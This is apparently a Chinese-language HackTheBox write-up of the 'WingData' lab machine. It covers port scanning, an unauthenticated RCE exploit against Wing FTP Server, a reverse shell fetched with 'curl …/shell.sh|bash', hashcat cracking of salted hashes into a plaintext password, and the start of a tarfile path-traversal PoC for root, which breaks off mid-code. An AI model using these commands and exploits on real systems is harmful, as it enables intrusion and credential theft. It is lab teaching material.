<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="1. 信息搜集1.1 端口扫描对目标机器进行端口、服务和操作系统探测扫描：只能从Web站点入手。 1nmap -sC -sV --min-rate&#x3D;10000 -p- -O -v -oN .&#x2F;nmap&#x2F;wingdata.nmap 10.129.244.119   添加本地解析到&#x2F;etc&#x2F;hosts文件中后访问Web站点。  1.2 Web枚举在主页的Client Portal指">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox WingData">
<meta property="og:url" content="http://example.com/2026/02/19/HackTheBox-WingData/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="1. 信息搜集1.1 端口扫描对目标机器进行端口、服务和操作系统探测扫描：只能从Web站点入手。 1nmap -sC -sV --min-rate&#x3D;10000 -p- -O -v -oN .&#x2F;nmap&#x2F;wingdata.nmap 10.129.244.119   添加本地解析到&#x2F;etc&#x2F;hosts文件中后访问Web站点。  1.2 Web枚举在主页的Client Portal指">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771522492674.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771522592623.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771522688547.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771522805999.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771522897042.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771523473043.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771523550739.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771523589944.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771524033903.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771523921831.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771524103871.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771524471595.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771524530895.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771525040784.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771530176428.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771531215687.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771531300018.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771531967956.png">
<meta property="og:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771532061939.png">
<meta property="article:published_time" content="2026-02-18T17:28:16.000Z">
<meta property="article:modified_time" content="2026-02-19T20:15:15.368Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2026/02/19/HackTheBox-WingData/1771522492674.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>HackTheBox WingData</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 8.1.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2026/02/16/PortSwigger-SQL-Injection/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2026/02/19/HackTheBox-WingData/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2026/02/19/HackTheBox-WingData/&text=HackTheBox WingData"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2026/02/19/HackTheBox-WingData/&title=HackTheBox WingData"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2026/02/19/HackTheBox-WingData/&is_video=false&description=HackTheBox WingData"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox WingData&body=Check out this article: http://example.com/2026/02/19/HackTheBox-WingData/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2026/02/19/HackTheBox-WingData/&title=HackTheBox WingData"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2026/02/19/HackTheBox-WingData/&title=HackTheBox WingData"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2026/02/19/HackTheBox-WingData/&title=HackTheBox WingData"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2026/02/19/HackTheBox-WingData/&title=HackTheBox WingData"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2026/02/19/HackTheBox-WingData/&name=HackTheBox WingData&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2026/02/19/HackTheBox-WingData/&t=HackTheBox WingData"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="toc-number">1.</span> <span class="toc-text">1. 信息搜集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-1-%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.1.</span> <span class="toc-text">1.1 端口扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-2-Web%E6%9E%9A%E4%B8%BE"><span class="toc-number">1.2.</span> <span class="toc-text">1.2 Web枚举</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%88%9D%E5%A7%8B%E7%AB%8B%E8%B6%B3"><span class="toc-number">2.</span> <span class="toc-text">2. 初始立足</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#2-1-CVE-2025-47812"><span class="toc-number">2.1.</span> <span class="toc-text">2.1 CVE-2025-47812</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="toc-number">3.</span> <span class="toc-text">3. 横向移动</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#3-1-%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3"><span class="toc-number">3.1.</span> <span class="toc-text">3.1 密码破解</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">4.</span> <span class="toc-text">4. 权限提升</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#4-1-CVE-2025-4517"><span class="toc-number">4.1.</span> <span class="toc-text">4.1 CVE-2025-4517</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        HackTheBox WingData
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">John Doe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2026-02-18T17:28:16.000Z" class="dt-published" itemprop="datePublished">2026-02-19</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="1-信息搜集"><a href="#1-信息搜集" class="headerlink" title="1. 信息搜集"></a>1. 信息搜集</h2><h3 id="1-1-端口扫描"><a href="#1-1-端口扫描" class="headerlink" title="1.1 端口扫描"></a>1.1 端口扫描</h3><p>对目标机器进行端口、服务和操作系统探测扫描：只能从Web站点入手。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sC -sV --min-rate=10000 -p- -O -v -oN ./nmap/wingdata.nmap 10.129.244.119</span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/19/HackTheBox-WingData/1771522492674.png" alt="1771522492674"></p>
<p>添加本地解析到&#x2F;etc&#x2F;hosts文件中后访问Web站点。</p>
<p><img src="/2026/02/19/HackTheBox-WingData/1771522592623.png" alt="1771522592623"></p>
<h3 id="1-2-Web枚举"><a href="#1-2-Web枚举" class="headerlink" title="1.2 Web枚举"></a>1.2 Web枚举</h3><p>在主页的Client Portal指向的链接中，发现了子域名ftp.wingdata.htb。</p>
<p><img src="/2026/02/19/HackTheBox-WingData/1771522688547.png" alt="1771522688547"></p>
<p>继续将子域名添加到&#x2F;etc&#x2F;hosts本地解析之后，访问该子域名：是Wing FTP Server v7.4.3。</p>
<p><img src="/2026/02/19/HackTheBox-WingData/1771522805999.png" alt="1771522805999"></p>
<h2 id="2-初始立足"><a href="#2-初始立足" class="headerlink" title="2. 初始立足"></a>2. 初始立足</h2><h3 id="2-1-CVE-2025-47812"><a href="#2-1-CVE-2025-47812" class="headerlink" title="2.1 CVE-2025-47812"></a>2.1 CVE-2025-47812</h3><p>寻找Wing FTP Server v7.4.3版本的漏洞，在<a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/52347">Exploit-DB</a>中发现了未授权的远程RCE漏洞。</p>
<p><img src="/2026/02/19/HackTheBox-WingData/1771522897042.png" alt="1771522897042"></p>
<p>下载上面的EXP到本地进行利用，未授权命令执行成功。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python exploit.py -u http://ftp.wingdata.htb/ -c &quot;id&quot; </span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/19/HackTheBox-WingData/1771523473043.png" alt="1771523473043"></p>
<p>反弹Shell到本地。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python exploit.py -u http://ftp.wingdata.htb/ -c &quot;curl http://10.10.16.47/shell.sh|bash&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/19/HackTheBox-WingData/1771523550739.png" alt="1771523550739"></p>
<p>另一边已经接收到了Shell。</p>
<p><img src="/2026/02/19/HackTheBox-WingData/1771523589944.png" alt="1771523589944"></p>
<h2 id="3-横向移动"><a href="#3-横向移动" class="headerlink" title="3. 横向移动"></a>3. 横向移动</h2><h3 id="3-1-密码破解"><a href="#3-1-密码破解" class="headerlink" title="3.1 密码破解"></a>3.1 密码破解</h3><p>在&#x2F;opt&#x2F;wftpserver&#x2F;Data&#x2F;1&#x2F;settings.xml配置文件中发现了加密users的密码加密存储方式为SHA256。</p>
<p>其中加盐字符串为<code>WingFTP</code>，记录以便后续爆破。</p>
<p><img src="/2026/02/19/HackTheBox-WingData/1771524033903.png" alt="1771524033903"></p>
<p>在users目录下，存在几个用户信息存储文件，其中wacky和&#x2F;etc&#x2F;passwd中用户名相同，可尝试密码复用。</p>
<p><img src="/2026/02/19/HackTheBox-WingData/1771523921831.png" alt="1771523921831"></p>
<p>过滤其中加密的密码密文。</p>
<p><img src="/2026/02/19/HackTheBox-WingData/1771524103871.png" alt="1771524103871"></p>
<p>将其提取到本地进行爆破，需要破解带盐格式的SHA256密文。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">Hash mode #1410</span><br><span class="line">  Name................: sha256($pass.$salt)</span><br><span class="line">  Category............: Raw Hash salted and/or iterated</span><br><span class="line">  Slow.Hash...........: No</span><br><span class="line">  Password.Len.Min....: 0</span><br><span class="line">  Password.Len.Max....: 256</span><br><span class="line">  Salt.Type...........: Generic</span><br><span class="line">  Salt.Len.Min........: 0</span><br><span class="line">  Salt.Len.Max........: 256</span><br><span class="line">  Kernel.Type(s)......: pure, optimized</span><br><span class="line">  Example.Hash.Format.: plain</span><br><span class="line">--</span><br><span class="line">  Example.Hash.Format.: plain</span><br><span class="line">  Example.Hash........: 53b325182924b356:1412781058343178</span><br><span class="line">  Example.Pass........: hashcat1</span><br><span class="line">  Benchmark.Mask......: ?b?b?b?b?b?b?bx</span><br><span class="line">  Autodetect.Enabled..: Yes</span><br><span class="line">  Self.Test.Enabled...: Yes</span><br><span class="line">  Potfile.Enabled.....: Yes</span><br><span class="line">  Custom.Plugin.......: No</span><br><span class="line">  Plaintext.Encoding..: ASCII, HEX</span><br></pre></td></tr></table></figure>

<p>格式如上面所示，格式为Hash:Salt。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP</span><br><span class="line">c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10:WingFTP</span><br><span class="line">a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03:WingFTP</span><br><span class="line">5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca:WingFTP</span><br><span class="line">32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP</span><br></pre></td></tr></table></figure>

<p>使用hashcat爆破模式进行爆破，得到密码<code>!#7Blushing^*Bride5</code>。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat -a 0 -m 1410 hash /usr/share/wordlists/rockyou.txt</span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/19/HackTheBox-WingData/1771524471595.png" alt="1771524471595"></p>
<p>之后尝试用<code>wacky:!#7Blushing^*Bride5</code>凭证进行连接。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh wacky@wingdata.htb</span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/19/HackTheBox-WingData/1771524530895.png" alt="1771524530895"></p>
<h2 id="4-权限提升"><a href="#4-权限提升" class="headerlink" title="4. 权限提升"></a>4. 权限提升</h2><h3 id="4-1-CVE-2025-4517"><a href="#4-1-CVE-2025-4517" class="headerlink" title="4.1 CVE-2025-4517"></a>4.1 CVE-2025-4517</h3><p>Sudo枚举发现可以以root权限执行python脚本。</p>
<p>这是个备份恢复脚本，可以将指定压缩包解压到指定目录。</p>
<p><img src="/2026/02/19/HackTheBox-WingData/1771525040784.png" alt="1771525040784"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">import</span> tarfile</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line"></span><br><span class="line">BACKUP_BASE_DIR = <span class="string">&quot;/opt/backup_clients/backups&quot;</span></span><br><span class="line">STAGING_BASE = <span class="string">&quot;/opt/backup_clients/restored_backups&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">validate_backup_name</span>(<span class="params">filename</span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> re.fullmatch(<span class="string">r&quot;^backup_\d+\.tar$&quot;</span>, filename):</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    client_id = filename.split(<span class="string">&#x27;_&#x27;</span>)[<span class="number">1</span>].rstrip(<span class="string">&#x27;.tar&#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> client_id.isdigit() <span class="keyword">and</span> client_id != <span class="string">&quot;0&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">validate_restore_tag</span>(<span class="params">tag</span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">bool</span>(re.fullmatch(<span class="string">r&quot;^[a-zA-Z0-9_]&#123;1,24&#125;$&quot;</span>, tag))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    parser = argparse.ArgumentParser(</span><br><span class="line">        description=<span class="string">&quot;Restore client configuration from a validated backup tarball.&quot;</span>,</span><br><span class="line">        epilog=<span class="string">&quot;Example: sudo %(prog)s -b backup_1001.tar -r restore_john&quot;</span></span><br><span class="line">    )</span><br><span class="line">    parser.add_argument(</span><br><span class="line">        <span class="string">&quot;-b&quot;</span>, <span class="string">&quot;--backup&quot;</span>,</span><br><span class="line">        required=<span class="literal">True</span>,</span><br><span class="line">        <span class="built_in">help</span>=<span class="string">&quot;Backup filename (must be in /home/wacky/backup_clients/ and match backup_&lt;client_id&gt;.tar, &quot;</span></span><br><span class="line">             <span class="string">&quot;where &lt;client_id&gt; is a positive integer, e.g., backup_1001.tar)&quot;</span></span><br><span class="line">    )</span><br><span class="line">    parser.add_argument(</span><br><span class="line">        <span class="string">&quot;-r&quot;</span>, <span class="string">&quot;--restore-dir&quot;</span>,</span><br><span class="line">        required=<span class="literal">True</span>,</span><br><span class="line">        <span class="built_in">help</span>=<span class="string">&quot;Staging directory name for the restore operation. &quot;</span></span><br><span class="line">             <span class="string">&quot;Must follow the format: restore_&lt;client_user&gt; (e.g., restore_john). &quot;</span></span><br><span class="line">             <span class="string">&quot;Only alphanumeric characters and underscores are allowed in the &lt;client_user&gt; part (1–24 characters).&quot;</span></span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line">    args = parser.parse_args()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> validate_backup_name(args.backup):</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;[!] Invalid backup name. Expected format: backup_&lt;client_id&gt;.tar (e.g., backup_1001.tar)&quot;</span>, file=sys.stderr)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    backup_path = os.path.join(BACKUP_BASE_DIR, args.backup)</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> os.path.isfile(backup_path):</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;[!] Backup file not found: <span class="subst">&#123;backup_path&#125;</span>&quot;</span>, file=sys.stderr)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> args.restore_dir.startswith(<span class="string">&quot;restore_&quot;</span>):</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;[!] --restore-dir must start with &#x27;restore_&#x27;&quot;</span>, file=sys.stderr)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    tag = args.restore_dir[<span class="number">8</span>:]</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> tag:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;[!] --restore-dir must include a non-empty tag after &#x27;restore_&#x27;&quot;</span>, file=sys.stderr)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> validate_restore_tag(tag):</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;[!] Restore tag must be 1–24 characters long and contain only letters, digits, or underscores&quot;</span>, file=sys.stderr)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    staging_dir = os.path.join(STAGING_BASE, args.restore_dir)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;[+] Backup: <span class="subst">&#123;args.backup&#125;</span>&quot;</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;[+] Staging directory: <span class="subst">&#123;staging_dir&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">    os.makedirs(staging_dir, exist_ok=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">with</span> tarfile.<span class="built_in">open</span>(backup_path, <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> tar:</span><br><span class="line">            tar.extractall(path=staging_dir, <span class="built_in">filter</span>=<span class="string">&quot;data&quot;</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;[+] Extraction completed in <span class="subst">&#123;staging_dir&#125;</span>&quot;</span>)</span><br><span class="line">    <span class="keyword">except</span> (tarfile.TarError, OSError, Exception) <span class="keyword">as</span> e:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;[!] Error during extraction: <span class="subst">&#123;e&#125;</span>&quot;</span>, file=sys.stderr)</span><br><span class="line">        sys.exit(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>

<p>在<a target="_blank" rel="noopener" href="https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f">security-research</a>中找到了关于Python tarfile库的漏洞。</p>
<p>tarfile中的tar和data过滤器使用os.path.realpath()来验证路径，但如果超过PATH_MAX，则不会报错，在extractall()或者extract期间，路径会被使用，而不通过os.path.realpath()传递。</p>
<p>该漏洞可以对目标机器任意写、覆盖。</p>
<hr>
<p>搭建测试环境：用conda创建python 3.12.3版本的环境。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">conda create --name=tarfile python=3.12.3</span><br><span class="line">mkdir flag</span><br><span class="line">echo &quot;hello world&quot; &gt; flag/flag</span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/19/HackTheBox-WingData/1771530176428.png" alt="1771530176428"></p>
<p>用Python运行下面的代码，得到一个压缩包poc.tar。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> tarfile</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> io</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="comment"># 247 (55 on OSX) picked so the expanded path of dirs is 3968 bytes long (or 896</span></span><br><span class="line"><span class="comment"># on OSX), leaving 128 bytes for a prefix and at least a few chars of the link</span></span><br><span class="line">comp = <span class="string">&#x27;d&#x27;</span> * (<span class="number">55</span> <span class="keyword">if</span> sys.platform == <span class="string">&#x27;darwin&#x27;</span> <span class="keyword">else</span> <span class="number">247</span>)</span><br><span class="line">steps = <span class="string">&quot;abcdefghijklmnop&quot;</span></span><br><span class="line">path = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">with</span> tarfile.<span class="built_in">open</span>(<span class="string">&quot;poc.tar&quot;</span>, mode=<span class="string">&quot;x&quot;</span>) <span class="keyword">as</span> tar:</span><br><span class="line">    <span class="comment"># populate the symlinks and dirs that expand in os.path.realpath()</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> steps:</span><br><span class="line">        a = tarfile.TarInfo(os.path.join(path, comp))</span><br><span class="line">        a.<span class="built_in">type</span> = tarfile.DIRTYPE</span><br><span class="line">        tar.addfile(a)</span><br><span class="line">        b = tarfile.TarInfo(os.path.join(path, i))</span><br><span class="line">        b.<span class="built_in">type</span> = tarfile.SYMTYPE</span><br><span class="line">        b.linkname = comp</span><br><span class="line">        